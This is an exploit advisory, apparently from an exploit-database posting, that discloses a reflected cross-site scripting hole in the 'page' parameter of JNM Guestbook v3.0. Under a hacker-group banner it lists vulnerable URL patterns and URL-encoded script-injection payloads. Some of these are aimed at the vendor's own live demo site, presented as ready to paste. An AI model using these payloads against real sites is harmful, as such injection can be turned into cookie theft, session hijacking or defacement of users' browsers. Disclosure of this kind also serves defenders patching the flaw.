JNM Guestbook version 3.0 suffers from a cross site scripting vulnerability.
30d52832e26f1e63d77278530421a4b863521029fa4fe90f4284354a609c8af9
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] I am from the hell...
==============================================================================
[»] JNM Guestbook v3.0 Remote XSS vulnerability
==============================================================================
[»] Script: [ JNM Guestbook v3.0 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.jnmsolutions.co.uk/index.php?act=scripts&page=guestbook ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...]
[»] Team: [ EvilWay ]
[»] SiteWeb: [ Want your site here ? ADD ME MSN. ]
[»] Price: [ £14.99 ]
###########################################################################
===[ XSS ]===
[»] http://www.site.com/patch/index.php?page=[XSS]&order=asc
[»] http://www.site.com/patch/?page=[XSS]&order=asc
===[ LIVE ]===
[»] http://www.jnmsolutions.co.uk/scripts/guestbook/test2/index.php?page=
[»] XSS TO ADD: 1%3E%27%3E%3CScRiPt%20%0A%0D%3Ealert(309018679930)%3B%3C/ScRiPt%3E&order=asc
[»] http://www.jnmsolutions.co.uk/scripts/guestbook/test2/?page=
[»] XSS TO ADD: 1%3E%27%3E%3CScRiPt%20%0A%0D%3Ealert(309018679930)%3B%3C/ScRiPt%3E&order=asc
Note: -.-
Author: Moudi
###########################################################################